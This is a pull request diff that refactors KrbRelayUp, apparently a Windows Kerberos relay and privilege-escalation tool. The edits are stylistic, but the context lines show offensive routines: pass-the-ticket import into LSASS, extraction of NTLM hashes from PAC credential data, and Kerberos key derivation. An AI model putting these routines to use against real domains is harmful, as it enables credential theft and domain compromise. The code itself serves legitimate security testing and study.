### PR TITLE
Code cleanup and minor optimizations

### DIFF
--- a/KrbRelayUp/AskTGT.cs
+++ b/KrbRelayUp/AskTGT.cs
@@ -4,9 +4,7 @@ using KrbRelayUp.Kerberos;
 using KrbRelayUp.Kerberos.PAC;
 using KrbRelayUp.lib.Interop;
 using System;
-using System.Collections.Generic;
 using System.Linq;
-using System.Text;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/AskTGT.cs
+++ b/KrbRelayUp/AskTGT.cs
@@ -260,7 +260,7 @@ namespace KrbRelayUp
                 }
             }
 
-            if (ptt || ((ulong)luid != 0))
+            if (ptt || (luid != 0))
             {
                 // pass-the-ticket -> import into LSASS
                 LSA.ImportTicket(kirbiBytes, luid);

--- a/KrbRelayUp/AskTGT.cs
+++ b/KrbRelayUp/AskTGT.cs
@@ -145,7 +145,7 @@ namespace KrbRelayUp
             if (rep.enc_part.etype != (int)etype)
             {
                 // maybe this should be a fatal error instead of just a warning?
-                Console.WriteLine($"[!] Warning: Supplied encyption key type is {etype} but AS-REP contains data encrypted with {(Interop.KERB_ETYPE)rep.enc_part.etype}");
+                Console.WriteLine($"[!] Warning: Supplied encryption key type is {etype} but AS-REP contains data encrypted with {(Interop.KERB_ETYPE)rep.enc_part.etype}");
             }
 
             // decrypt the enc_part containing the session key/etc.

--- a/KrbRelayUp/AskTGT.cs
+++ b/KrbRelayUp/AskTGT.cs
@@ -133,7 +133,7 @@ namespace KrbRelayUp
             {
                 // generate the decryption key using Diffie Hellman shared secret 
                 PA_PK_AS_REP pkAsRep = (PA_PK_AS_REP)rep.padata[0].value;
-                key = pkAsReq.Agreement.GenerateKey(pkAsRep.DHRepInfo.KDCDHKeyInfo.SubjectPublicKey.DepadLeft(), new byte[0],
+                key = pkAsReq.Agreement.GenerateKey(pkAsRep.DHRepInfo.KDCDHKeyInfo.SubjectPublicKey.DepadLeft(), Array.Empty<byte>(),
                     pkAsRep.DHRepInfo.ServerDHNonce, GetKeySize(etype));
             }
             else

--- a/KrbRelayUp/AskTGT.cs
+++ b/KrbRelayUp/AskTGT.cs
@@ -318,11 +318,11 @@ namespace KrbRelayUp
                                         int flags = BitConverter.ToInt32((byte[])(Array)credData.Credentials, 4);
                                         if (flags == 3)
                                         {
-                                            hash = String.Format("{0}:{1}", Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(8).Take(16).ToArray()), Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(24).Take(16).ToArray()));
+                                            hash = $"{Helpers.ByteArrayToString(((byte[]) (Array) credData.Credentials).Skip(8).Take(16).ToArray())}:{Helpers.ByteArrayToString(((byte[]) (Array) credData.Credentials).Skip(24).Take(16).ToArray())}";
                                         }
                                         else
                                         {
-                                            hash = String.Format("{0}", Helpers.ByteArrayToString(((byte[])(Array)credData.Credentials).Skip(24).Take(16).ToArray()));
+                                            hash = $"{Helpers.ByteArrayToString(((byte[]) (Array) credData.Credentials).Skip(24).Take(16).ToArray())}";
                                         }
                                     }
                                     else

--- a/KrbRelayUp/Asn1/AsnElt.cs
+++ b/KrbRelayUp/Asn1/AsnElt.cs
@@ -942,7 +942,7 @@ namespace Asn1
                         throw new AsnException(
                             "integer overflow (negative)");
                     }
-                    x = (x << 8) + (long)ValueByte(k);
+                    x = (x << 8) + ValueByte(k);
                 }
             }
             else
@@ -955,7 +955,7 @@ namespace Asn1
                         throw new AsnException(
                             "integer overflow (positive)");
                     }
-                    x = (x << 8) + (long)ValueByte(k);
+                    x = (x << 8) + ValueByte(k);
                 }
             }
             return x;
@@ -1052,7 +1052,7 @@ namespace Asn1
                 int orig = off;
                 foreach (AsnElt ae in Sub)
                 {
-                    ae.CheckTag(AsnElt.OCTET_STRING);
+                    ae.CheckTag(OCTET_STRING);
                     off += ae.GetOctetString(dst, off);
                 }
                 return off - orig;
@@ -1162,7 +1162,7 @@ namespace Asn1
                     throw new AsnException(
                         "invalid OID: integer overflow");
                 }
-                acc = (acc << 7) + (long)(v & 0x7F);
+                acc = (acc << 7) + (v & 0x7F);
                 if ((v & 0x80) == 0)
                 {
                     sb.Append('.');
@@ -2259,7 +2259,7 @@ namespace Asn1
                 {
                     if (x[i] != y[i])
                     {
-                        return (int)x[i] - (int)y[i];
+                        return x[i] - y[i];
                     }
                 }
                 return xLen - yLen;
@@ -2303,12 +2303,12 @@ namespace Asn1
             return a;
         }
 
-        public static AsnElt NULL_V = AsnElt.MakePrimitive(
+        public static AsnElt NULL_V = MakePrimitive(
             NULL, new byte[0]);
 
-        public static AsnElt BOOL_TRUE = AsnElt.MakePrimitive(
+        public static AsnElt BOOL_TRUE = MakePrimitive(
             BOOLEAN, new byte[] { 0xFF });
-        public static AsnElt BOOL_FALSE = AsnElt.MakePrimitive(
+        public static AsnElt BOOL_FALSE = MakePrimitive(
             BOOLEAN, new byte[] { 0x00 });
 
         /*
@@ -2348,7 +2348,7 @@ namespace Asn1
                 {
                     throw new AsnException("OID element overflow");
                 }
-                x = x * (long)10 + (long)(c - '0');
+                x = x * 10 + (c - '0');
             }
             if (x < 0)
             {

--- a/KrbRelayUp/Asn1/AsnElt.cs
+++ b/KrbRelayUp/Asn1/AsnElt.cs
@@ -2159,7 +2159,7 @@ namespace Asn1
             a.TagValue = tagValue;
             if (subs == null)
             {
-                a.Sub = new AsnElt[0];
+                a.Sub = Array.Empty<AsnElt>();
             }
             else
             {
@@ -2187,7 +2187,7 @@ namespace Asn1
             a.TagValue = SET;
             if (subs == null)
             {
-                a.Sub = new AsnElt[0];
+                a.Sub = Array.Empty<AsnElt>();
             }
             else
             {
@@ -2269,7 +2269,7 @@ namespace Asn1
         }
 
         public static AsnElt NULL_V = MakePrimitive(
-            NULL, new byte[0]);
+            NULL, Array.Empty<byte>());
 
         public static AsnElt BOOL_TRUE = MakePrimitive(
             BOOLEAN, new byte[] { 0xFF });

--- a/KrbRelayUp/Asn1/AsnElt.cs
+++ b/KrbRelayUp/Asn1/AsnElt.cs
@@ -332,7 +332,7 @@ namespace Asn1
                 case PRIVATE:
                     return "PRIVATE:" + tv;
                 default:
-                    return String.Format("INVALID:{0}/{1}", tc, tv);
+                    return $"INVALID:{tc}/{tv}";
             }
 
             switch (tv)
@@ -844,9 +844,7 @@ namespace Asn1
             int vlen = ValueLength;
             if (off < 0 || len < 0 || len > (vlen - off))
             {
-                throw new AsnException(String.Format(
-                    "invalid value window {0}:{1}"
-                    + " (value length = {2})", off, len, vlen));
+                throw new AsnException($"invalid value window {off}:{len}" + $" (value length = {vlen})");
             }
             EncodeValue(off, off + len, dst, dstOff);
         }
@@ -908,8 +906,7 @@ namespace Asn1
             int vlen = ValueLength;
             if (vlen != 1)
             {
-                throw new AsnException(String.Format(
-                    "invalid BOOLEAN (length = {0})", vlen));
+                throw new AsnException($"invalid BOOLEAN (length = {vlen})");
             }
             return ValueByte(0) != 0;
         }
@@ -1101,8 +1098,7 @@ namespace Asn1
             int fb = ValueByte(0);
             if (fb > 7 || (vlen == 1 && fb != 0))
             {
-                throw new AsnException(String.Format(
-                    "invalid BIT STRING (start = 0x{0:X2})", fb));
+                throw new AsnException($"invalid BIT STRING (start = 0x{fb:X2})");
             }
             byte[] r = new byte[vlen - 1];
             CopyValueChunk(1, vlen - 1, r, 0);
@@ -1126,8 +1122,7 @@ namespace Asn1
             }
             if (ValueLength != 0)
             {
-                throw new AsnException(String.Format(
-                    "invalid NULL (length = {0})", ValueLength));
+                throw new AsnException($"invalid NULL (length = {ValueLength})");
             }
         }
 
@@ -1889,7 +1884,7 @@ namespace Asn1
         static AsnException BadTime(int type, string s, Exception e)
         {
             string tt = (type == UTCTime) ? "UTCTime" : "GeneralizedTime";
-            string msg = String.Format("invalid {0} string: '{1}'", tt, s);
+            string msg = $"invalid {tt} string: '{s}'";
             if (e == null)
             {
                 return new AsnException(msg);
@@ -2336,9 +2331,7 @@ namespace Asn1
                 }
                 if (c < '0' || c > '9')
                 {
-                    throw new AsnException(String.Format(
-                        "invalid character U+{0:X4} in OID",
-                        c));
+                    throw new AsnException($"invalid character U+{c:X4} in OID");
                 }
                 if (x < 0)
                 {
@@ -2538,9 +2531,7 @@ namespace Asn1
                     int year = dt.Year;
                     if (year < 1950 || year >= 2050)
                     {
-                        throw new AsnException(String.Format(
-                            "cannot encode year {0} as UTCTime",
-                            year));
+                        throw new AsnException($"cannot encode year {year} as UTCTime");
                     }
                     year = year % 100;
                     str = String.Format(

--- a/KrbRelayUp/Asn1/AsnElt.cs
+++ b/KrbRelayUp/Asn1/AsnElt.cs
@@ -107,14 +107,8 @@ namespace Asn1
         int tagClass_;
         public int TagClass
         {
-            get
-            {
-                return tagClass_;
-            }
-            private set
-            {
-                tagClass_ = value;
-            }
+            get => tagClass_;
+            private set => tagClass_ = value;
         }
 
         /*
@@ -123,14 +117,8 @@ namespace Asn1
         int tagValue_;
         public int TagValue
         {
-            get
-            {
-                return tagValue_;
-            }
-            private set
-            {
-                tagValue_ = value;
-            }
+            get => tagValue_;
+            private set => tagValue_ = value;
         }
 
         /*
@@ -140,27 +128,15 @@ namespace Asn1
         AsnElt[] sub_;
         public AsnElt[] Sub
         {
-            get
-            {
-                return sub_;
-            }
-            private set
-            {
-                sub_ = value;
-            }
+            get => sub_;
+            private set => sub_ = value;
         }
 
         /*
          * The "constructed" flag: true for an elements with sub-elements,
          * false for a primitive element.
          */
-        public bool Constructed
-        {
-            get
-            {
-                return Sub != null;
-            }
-        }
+        public bool Constructed => Sub != null;
 
         /*
          * The value length. When the object is BER-encoded with an
@@ -311,13 +287,7 @@ namespace Asn1
         /*
          * Get a string representation of the tag class and value.
          */
-        public string TagString
-        {
-            get
-            {
-                return TagToString(TagClass, TagValue);
-            }
-        }
+        public string TagString => TagToString(TagClass, TagValue);
 
         static string TagToString(int tc, int tv)
         {

--- a/KrbRelayUp/Asn1/AsnIO.cs
+++ b/KrbRelayUp/Asn1/AsnIO.cs
@@ -1,7 +1,4 @@
 using System;
-using System.Collections.Generic;
-using System.IO;
-using System.Text;
 
 namespace Asn1
 {

--- a/KrbRelayUp/Asn1/AsnOID.cs
+++ b/KrbRelayUp/Asn1/AsnOID.cs
@@ -244,7 +244,7 @@ namespace Asn1
             StringBuilder sb = new StringBuilder();
             foreach (char c in name)
             {
-                int d = (int)c;
+                int d = c;
                 if (d <= 32 || d == '-')
                 {
                     continue;
@@ -253,7 +253,7 @@ namespace Asn1
                 {
                     d += 'a' - 'A';
                 }
-                sb.Append((char)c);
+                sb.Append(c);
             }
             return sb.ToString();
         }

--- a/KrbRelayUp/Kerb/Crypto.cs
+++ b/KrbRelayUp/Kerb/Crypto.cs
@@ -13,12 +13,12 @@ namespace KrbRelayUp
 
             Console.WriteLine("[*] Input password             : {0}", password);
 
-            string salt = String.Format("{0}{1}", domainName.ToUpper(), userName);
+            string salt = $"{domainName.ToUpper()}{userName}";
 
             // special case for computer account salts
             if (userName.EndsWith("$"))
             {
-                salt = String.Format("{0}host{1}.{2}", domainName.ToUpper(), userName.TrimEnd('$').ToLower(), domainName.ToLower());
+                salt = $"{domainName.ToUpper()}host{userName.TrimEnd('$').ToLower()}.{domainName.ToLower()}";
             }
 
             if (!String.IsNullOrEmpty(userName) && !String.IsNullOrEmpty(domainName))
@@ -43,7 +43,7 @@ namespace KrbRelayUp
                 string aes256Hash = KerberosPasswordHash(Interop.KERB_ETYPE.aes256_cts_hmac_sha1, password, salt);
                 Console.WriteLine("[*]       aes256_cts_hmac_sha1 : {0}", aes256Hash);
 
-                string desHash = KerberosPasswordHash(Interop.KERB_ETYPE.des_cbc_md5, String.Format("{0}{1}", password, salt), salt);
+                string desHash = KerberosPasswordHash(Interop.KERB_ETYPE.des_cbc_md5, $"{password}{salt}", salt);
                 Console.WriteLine("[*]       des_cbc_md5          : {0}", desHash);
             }
 

--- a/KrbRelayUp/Kerb/Crypto.cs
+++ b/KrbRelayUp/Kerb/Crypto.cs
@@ -1,6 +1,5 @@
 ﻿using System;
 using System.Linq;
-using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using System.ComponentModel;
 

--- a/KrbRelayUp/Kerb/Crypto.cs
+++ b/KrbRelayUp/Kerb/Crypto.cs
@@ -61,12 +61,12 @@ namespace KrbRelayUp
             // locate the crypto system for the hash type we want
             int status = Interop.CDLocateCSystem(etype, out pCSystemPtr);
 
-            pCSystem = (Interop.KERB_ECRYPT)System.Runtime.InteropServices.Marshal.PtrToStructure(pCSystemPtr, typeof(Interop.KERB_ECRYPT));
+            pCSystem = (Interop.KERB_ECRYPT)Marshal.PtrToStructure(pCSystemPtr, typeof(Interop.KERB_ECRYPT));
             if (status != 0)
-                throw new System.ComponentModel.Win32Exception(status, "Error on CDLocateCSystem");
+                throw new Win32Exception(status, "Error on CDLocateCSystem");
 
             // get the delegate for the password hash function
-            Interop.KERB_ECRYPT_HashPassword pCSystemHashPassword = (Interop.KERB_ECRYPT_HashPassword)System.Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(pCSystem.HashPassword, typeof(Interop.KERB_ECRYPT_HashPassword));
+            Interop.KERB_ECRYPT_HashPassword pCSystemHashPassword = (Interop.KERB_ECRYPT_HashPassword)Marshal.GetDelegateForFunctionPointer(pCSystem.HashPassword, typeof(Interop.KERB_ECRYPT_HashPassword));
             Interop.UNICODE_STRING passwordUnicode = new Interop.UNICODE_STRING(password);
             Interop.UNICODE_STRING saltUnicode = new Interop.UNICODE_STRING(salt);
 
@@ -77,7 +77,7 @@ namespace KrbRelayUp
             if (status != 0)
                 throw new Win32Exception(status);
 
-            return System.BitConverter.ToString(output).Replace("-", "");
+            return BitConverter.ToString(output).Replace("-", "");
         }
 
         // Adapted from Vincent LE TOUX' "MakeMeEnterpriseAdmin"
@@ -100,7 +100,7 @@ namespace KrbRelayUp
 
             // initialize the checksum
             // KERB_NON_KERB_CKSUM_SALT = 17
-            int status2 = pCheckSumInitializeEx(key, key.Length, (int)keyUsage, out Context);
+            int status2 = pCheckSumInitializeEx(key, key.Length, keyUsage, out Context);
             if (status2 != 0)
                 throw new Win32Exception(status2);
 

--- a/KrbRelayUp/Kerb/Helpers.cs
+++ b/KrbRelayUp/Kerb/Helpers.cs
@@ -3,13 +3,11 @@ using System.Collections.Generic;
 using System.Diagnostics;
 using System.IO;
 using System.Linq;
-using System.Runtime.InteropServices;
 using System.Security.Principal;
 using System.Text.RegularExpressions;
 using System.Threading;
 using System.DirectoryServices;
 using System.DirectoryServices.Protocols;
-using KrbRelayUp.lib.Interop;
 
 namespace KrbRelayUp
 {

--- a/KrbRelayUp/Kerb/Helpers.cs
+++ b/KrbRelayUp/Kerb/Helpers.cs
@@ -307,7 +307,7 @@ namespace KrbRelayUp
                 {
                     if (File.Exists(filePath))
                     {
-                        throw new Exception(String.Format("{0} already exists! Data not written to file.\r\n", filePath));
+                        throw new Exception($"{filePath} already exists! Data not written to file.\r\n");
                     }
                 }
                 File.WriteAllBytes(filePath, data);

--- a/KrbRelayUp/Kerb/Helpers.cs
+++ b/KrbRelayUp/Kerb/Helpers.cs
@@ -1,4 +1,4 @@
-﻿using System;
+using System;
 using System.Collections.Generic;
 using System.Diagnostics;
 using System.IO;
@@ -198,19 +198,19 @@ namespace KrbRelayUp
 
         #region File Helpers
 
-        static public string GetBaseFromFilename(string filename)
+        public static string GetBaseFromFilename(string filename)
         {
             return SplitBaseAndExtension(filename)[0];
         }
 
-        static public string GetExtensionFromFilename(string filename)
+        public static string GetExtensionFromFilename(string filename)
         {
             return SplitBaseAndExtension(filename)[1];
         }
 
         // Splits filename by into a basename and extension 
         // Returns an array representing [basename, extension]
-        static public string[] SplitBaseAndExtension(string filename)
+        public static string[] SplitBaseAndExtension(string filename)
         {
             string[] result = { filename, "" };
             string[] splitName = filename.Split('.');
@@ -224,7 +224,7 @@ namespace KrbRelayUp
             return result;
         }
 
-        static public string MakeValidFileName(string filePath)
+        public static string MakeValidFileName(string filePath)
         {
             // Can't use IO.Path.GetFileName and IO.Path.GetDirectoryName because they get confused by illegal file name characters (the whole reason we are here)
             string fileName = filePath;
@@ -275,7 +275,7 @@ namespace KrbRelayUp
             }
         }
 
-        static public int SearchBytePattern(byte[] pattern, byte[] bytes)
+        public static int SearchBytePattern(byte[] pattern, byte[] bytes)
         {
             List<int> positions = new List<int>();
             int patternLength = pattern.Length;
@@ -296,7 +296,7 @@ namespace KrbRelayUp
             return 0;
         }
 
-        static public bool WriteBytesToFile(string filename, byte[] data, bool overwrite = false)
+        public static bool WriteBytesToFile(string filename, byte[] data, bool overwrite = false)
         {
             bool result = true;
             string filePath = Path.GetFullPath(filename);
@@ -346,7 +346,7 @@ namespace KrbRelayUp
             "msds-supportedencryptiontypes"
         };
 
-        static public List<IDictionary<string, Object>> GetADObjects(List<SearchResultEntry> searchResults)
+        public static List<IDictionary<string, Object>> GetADObjects(List<SearchResultEntry> searchResults)
         {
             var ActiveDirectoryObjects = new List<IDictionary<string, Object>>();
 
@@ -396,7 +396,7 @@ namespace KrbRelayUp
             return ActiveDirectoryObjects;
         }
 
-        static public List<IDictionary<string, Object>> GetADObjects(SearchResultCollection searchResults)
+        public static List<IDictionary<string, Object>> GetADObjects(SearchResultCollection searchResults)
         {
             var ActiveDirectoryObjects = new List<IDictionary<string, Object>>();
 

--- a/KrbRelayUp/Kerb/Helpers.cs
+++ b/KrbRelayUp/Kerb/Helpers.cs
@@ -57,7 +57,7 @@ namespace KrbRelayUp
             if ((hex.Length % 16) != 0)
             {
                 Console.WriteLine("\r\n[X] Hash must be 16, 32 or 64 characters in length\r\n");
-                System.Environment.Exit(1);
+                Environment.Exit(1);
             }
 
             // yes I know this inefficient

--- a/KrbRelayUp/Kerb/Interop.cs
+++ b/KrbRelayUp/Kerb/Interop.cs
@@ -1,7 +1,4 @@
 ﻿using System;
-using Asn1;
-using System.Text;
-using System.Collections.Generic;
 using System.Runtime.InteropServices;
 using KrbRelayUp.lib.Interop;
 

--- a/KrbRelayUp/Kerb/Interop.cs
+++ b/KrbRelayUp/Kerb/Interop.cs
@@ -1489,7 +1489,7 @@ namespace KrbRelayUp
         public static extern int NetApiBufferFree(IntPtr Buffer);
 
         [DllImport("kernel32.dll")]
-        public extern static void GetSystemTime(ref SYSTEMTIME lpSystemTime);
+        public static extern void GetSystemTime(ref SYSTEMTIME lpSystemTime);
 
         // LSA functions
 

--- a/KrbRelayUp/Kerb/Interop/Luid.cs
+++ b/KrbRelayUp/Kerb/Interop/Luid.cs
@@ -58,7 +58,7 @@ namespace KrbRelayUp.lib.Interop
         public override string ToString()
         {
             UInt64 Value = ((UInt64)HighPart << 32) + LowPart;
-            return String.Format("0x{0:x}", Value);
+            return $"0x{Value:x}";
         }
 
         public static bool operator ==(LUID x, LUID y)

--- a/KrbRelayUp/Kerb/Interop/Luid.cs
+++ b/KrbRelayUp/Kerb/Interop/Luid.cs
@@ -1,8 +1,5 @@
 ﻿using System;
-using System.Collections.Generic;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
 
 namespace KrbRelayUp.lib.Interop
 {

--- a/KrbRelayUp/Kerb/Interop/Luid.cs
+++ b/KrbRelayUp/Kerb/Interop/Luid.cs
@@ -39,14 +39,14 @@ namespace KrbRelayUp.lib.Interop
             }
             else
             {
-                System.ArgumentException argEx = new System.ArgumentException("Passed LUID string value is not in a hex or decimal form", value);
+                ArgumentException argEx = new ArgumentException("Passed LUID string value is not in a hex or decimal form", value);
                 throw argEx;
             }
         }
 
         public override int GetHashCode()
         {
-            UInt64 Value = ((UInt64)this.HighPart << 32) + this.LowPart;
+            UInt64 Value = ((UInt64)HighPart << 32) + LowPart;
             return Value.GetHashCode();
         }
 
@@ -57,18 +57,18 @@ namespace KrbRelayUp.lib.Interop
 
         public override string ToString()
         {
-            UInt64 Value = ((UInt64)this.HighPart << 32) + this.LowPart;
-            return String.Format("0x{0:x}", (ulong)Value);
+            UInt64 Value = ((UInt64)HighPart << 32) + LowPart;
+            return String.Format("0x{0:x}", Value);
         }
 
         public static bool operator ==(LUID x, LUID y)
         {
-            return (((ulong)x) == ((ulong)y));
+            return (x == ((ulong)y));
         }
 
         public static bool operator !=(LUID x, LUID y)
         {
-            return (((ulong)x) != ((ulong)y));
+            return (x != ((ulong)y));
         }
 
         public static implicit operator ulong(LUID luid)

--- a/KrbRelayUp/Kerb/Interop/NtException.cs
+++ b/KrbRelayUp/Kerb/Interop/NtException.cs
@@ -1,9 +1,6 @@
 ﻿using System;
-using System.Collections.Generic;
 using System.ComponentModel;
-using System.Linq;
 using System.Runtime.InteropServices;
-using System.Text;
 
 namespace KrbRelayUp.lib.Interop
 {

--- a/KrbRelayUp/Kerb/KDCKeyAgreement.cs
+++ b/KrbRelayUp/Kerb/KDCKeyAgreement.cs
@@ -3,14 +3,12 @@ using System.Security.Cryptography;
 
 namespace KrbRelayUp
 {
-
     public class KDCKeyAgreement
     {
-
-        public byte[] P { get { return Oakley.Group14.Prime; } }
-        public byte[] G { get { return Oakley.Group14.Generator; } }
-        public byte[] Q { get { return Oakley.Group14.Factor; } }
-        public byte[] Y { get { return diffieHellman.PublicKey.PublicComponent; } }
+        public byte[] P => Oakley.Group14.Prime;
+        public byte[] G => Oakley.Group14.Generator;
+        public byte[] Q => Oakley.Group14.Factor;
+        public byte[] Y => diffieHellman.PublicKey.PublicComponent;
 
         ManagedDiffieHellmanOakley14 diffieHellman = new ManagedDiffieHellmanOakley14();
 

--- a/KrbRelayUp/Kerb/LSA.cs
+++ b/KrbRelayUp/Kerb/LSA.cs
@@ -92,7 +92,7 @@ namespace KrbRelayUp
             int AuthenticationPackage;
             int ntstatus, ProtocalStatus;
 
-            if ((ulong)targetLuid != 0)
+            if (targetLuid != 0)
             {
                 if (!Helpers.IsHighIntegrity())
                 {
@@ -146,7 +146,7 @@ namespace KrbRelayUp
                 request.KerbCredSize = ticket.Length;
                 request.KerbCredOffset = Marshal.SizeOf(typeof(Interop.KERB_SUBMIT_TKT_REQUEST));
 
-                if ((ulong)targetLuid != 0)
+                if (targetLuid != 0)
                 {
                     Console.WriteLine("[*] Target LUID: 0x{0:x}", (ulong)targetLuid);
                     request.LogonId = targetLuid;
@@ -193,7 +193,7 @@ namespace KrbRelayUp
             int AuthenticationPackage;
             int ntstatus, ProtocalStatus;
 
-            if ((ulong)targetLuid != 0)
+            if (targetLuid != 0)
             {
                 if (!Helpers.IsHighIntegrity())
                 {
@@ -225,7 +225,7 @@ namespace KrbRelayUp
                 var request = new Interop.KERB_PURGE_TKT_CACHE_REQUEST();
                 request.MessageType = Interop.KERB_PROTOCOL_MESSAGE_TYPE.KerbPurgeTicketCacheMessage;
 
-                if ((ulong)targetLuid != 0)
+                if (targetLuid != 0)
                 {
                     Console.WriteLine("[*] Target LUID: 0x{0:x}", (ulong)targetLuid);
                     request.LogonId = targetLuid;

--- a/KrbRelayUp/Kerb/LSA.cs
+++ b/KrbRelayUp/Kerb/LSA.cs
@@ -168,7 +168,7 @@ namespace KrbRelayUp
                 {
                     var winError = Interop.LsaNtStatusToWinError((uint)ProtocalStatus);
                     var errorMessage = new Win32Exception((int)winError).Message;
-                    Console.WriteLine("[X] Error {0} running LsaLookupAuthenticationPackage (ProtocalStatus): {1}", winError, errorMessage);
+                    Console.WriteLine("[X] Error {0} running LsaLookupAuthenticationPackage (ProtocolStatus): {1}", winError, errorMessage);
                     return;
                 }
                 Console.WriteLine("[+] Ticket successfully imported!");

--- a/KrbRelayUp/Kerb/Networking.cs
+++ b/KrbRelayUp/Kerb/Networking.cs
@@ -87,7 +87,7 @@ namespace KrbRelayUp
                             {
                                 Console.WriteLine("[*] Using domain controller: {0} ({1})", DCName, dcIP);
                             }
-                            return String.Format("{0}", dcIP);
+                            return $"{dcIP}";
                         }
                     }
                     Console.WriteLine("[X] Error resolving hostname '{0}' to an IP address: no IPv4 or IPv6 address found", DCName);
@@ -204,7 +204,7 @@ namespace KrbRelayUp
             }
             else if (!String.IsNullOrEmpty(domain))
             {
-                ldapOu = String.Format("DC={0}", domain.Replace(".", ",DC="));
+                ldapOu = $"DC={domain.Replace(".", ",DC=")}";
             }
 
             //If no DC, domain, credentials, or OU were specified
@@ -218,17 +218,17 @@ namespace KrbRelayUp
                 string bindPath = "";
                 if (!String.IsNullOrEmpty(ldapPrefix))
                 {
-                    bindPath = String.Format("LDAP://{0}", ldapPrefix);
+                    bindPath = $"LDAP://{ldapPrefix}";
                 }
                 if (!String.IsNullOrEmpty(ldapOu))
                 {
                     if (!String.IsNullOrEmpty(bindPath))
                     {
-                        bindPath = String.Format("{0}/{1}", bindPath, ldapOu);
+                        bindPath = $"{bindPath}/{ldapOu}";
                     }
                     else
                     {
-                        bindPath = String.Format("LDAP://{0}", ldapOu);
+                        bindPath = $"LDAP://{ldapOu}";
                     }
                 }
 
@@ -238,7 +238,7 @@ namespace KrbRelayUp
             if (cred != null)
             {
                 // if we're using alternate credentials for the connection
-                string userDomain = String.Format("{0}\\{1}", cred.Domain, cred.UserName);
+                string userDomain = $"{cred.Domain}\\{cred.UserName}";
                 directoryObject.Username = userDomain;
                 directoryObject.Password = cred.Password;
 
@@ -320,7 +320,7 @@ namespace KrbRelayUp
 
                 if (String.IsNullOrEmpty(OUName))
                 {
-                    OUName = String.Format("DC={0}", domain.Replace(".", ",DC="));
+                    OUName = $"DC={domain.Replace(".", ",DC=")}";
                 }
 
                 try
@@ -447,7 +447,7 @@ namespace KrbRelayUp
         public static Dictionary<string, Dictionary<string, Object>> GetGptTmplContent(string path, string user = null, string password = null)
         {
             Dictionary<string, Dictionary<string, Object>> IniObject = new Dictionary<string, Dictionary<string, Object>>();
-            string sysvolPath = String.Format("\\\\{0}\\SYSVOL", (new Uri(path).Host));
+            string sysvolPath = $"\\\\{(new Uri(path).Host)}\\SYSVOL";
 
             int result = AddRemoteConnection(null, sysvolPath, user, password);
             if (result != (int)Interop.SystemErrorCodes.ERROR_SUCCESS)
@@ -504,7 +504,7 @@ namespace KrbRelayUp
             if (host != null)
             {
                 string targetComputerName = host.Trim('\\');
-                paths.Add(String.Format("\\\\{0}\\IPC$", targetComputerName));
+                paths.Add($"\\\\{targetComputerName}\\IPC$");
             }
             else
             {
@@ -545,7 +545,7 @@ namespace KrbRelayUp
             if (host != null)
             {
                 string targetComputerName = host.Trim('\\');
-                paths.Add(String.Format("\\\\{0}\\IPC$", targetComputerName));
+                paths.Add($"\\\\{targetComputerName}\\IPC$");
             }
             else
             {

--- a/KrbRelayUp/Kerb/Networking.cs
+++ b/KrbRelayUp/Kerb/Networking.cs
@@ -44,7 +44,7 @@ namespace KrbRelayUp
                 }
                 catch
                 {
-                    string errorMessage = new Win32Exception((int)val).Message;
+                    string errorMessage = new Win32Exception(val).Message;
                     Console.WriteLine("\r\n [X] Error {0} retrieving domain controller : {1}", val, errorMessage);
                     Interop.NetApiBufferFree(pDCI);
                     return "";
@@ -77,9 +77,9 @@ namespace KrbRelayUp
                         Console.WriteLine("[X] Error: No domain controller could be located");
                         return null;
                     }
-                    System.Net.IPAddress[] dcIPs = System.Net.Dns.GetHostAddresses(DCName);
+                    IPAddress[] dcIPs = Dns.GetHostAddresses(DCName);
 
-                    foreach (System.Net.IPAddress dcIP in dcIPs)
+                    foreach (IPAddress dcIP in dcIPs)
                     {
                         if (dcIP.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork || dcIP.AddressFamily == System.Net.Sockets.AddressFamily.InterNetworkV6)
                         {
@@ -108,7 +108,7 @@ namespace KrbRelayUp
             {
                 try
                 {
-                    System.Net.IPHostEntry DC = System.Net.Dns.GetHostEntry(IP);
+                    IPHostEntry DC = Dns.GetHostEntry(IP);
                     return DC.HostName;
                 }
                 catch (Exception e)
@@ -122,7 +122,7 @@ namespace KrbRelayUp
 
         public static byte[] SendBytes(string server, int port, byte[] data)
         {
-            var ipEndPoint = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(server), port);
+            var ipEndPoint = new IPEndPoint(IPAddress.Parse(server), port);
             try
             {
                 using (System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(ipEndPoint.AddressFamily))
@@ -134,10 +134,10 @@ namespace KrbRelayUp
                     BinaryReader socketReader = new BinaryReader(client.GetStream());
                     BinaryWriter socketWriter = new BinaryWriter(client.GetStream());
 
-                    socketWriter.Write(System.Net.IPAddress.HostToNetworkOrder(data.Length));
+                    socketWriter.Write(IPAddress.HostToNetworkOrder(data.Length));
                     socketWriter.Write(data);
 
-                    int recordMark = System.Net.IPAddress.NetworkToHostOrder(socketReader.ReadInt32());
+                    int recordMark = IPAddress.NetworkToHostOrder(socketReader.ReadInt32());
                     int recordSize = recordMark & 0x7fffffff;
 
                     if ((recordMark & 0x80000000) > 0)
@@ -177,7 +177,7 @@ namespace KrbRelayUp
             return null;
         }
 
-        public static DirectoryEntry GetLdapSearchRoot(System.Net.NetworkCredential cred, string OUName, string domainController, string domain)
+        public static DirectoryEntry GetLdapSearchRoot(NetworkCredential cred, string OUName, string domainController, string domain)
         {
             DirectoryEntry directoryObject = null;
             string ldapPrefix = "";
@@ -276,12 +276,12 @@ namespace KrbRelayUp
             return directoryObject;
         }
 
-        public static List<IDictionary<string, Object>> GetLdapQuery(System.Net.NetworkCredential cred, string OUName, string domainController, string domain, string filter, bool ldaps = false)
+        public static List<IDictionary<string, Object>> GetLdapQuery(NetworkCredential cred, string OUName, string domainController, string domain, string filter, bool ldaps = false)
         {
             var ActiveDirectoryObjects = new List<IDictionary<string, Object>>();
             if (String.IsNullOrEmpty(domainController))
             {
-                domainController = Networking.GetDCName(domain); //if domain is null, this will try to find a DC in current user's domain
+                domainController = GetDCName(domain); //if domain is null, this will try to find a DC in current user's domain
             }
             if (String.IsNullOrEmpty(domainController))
             {
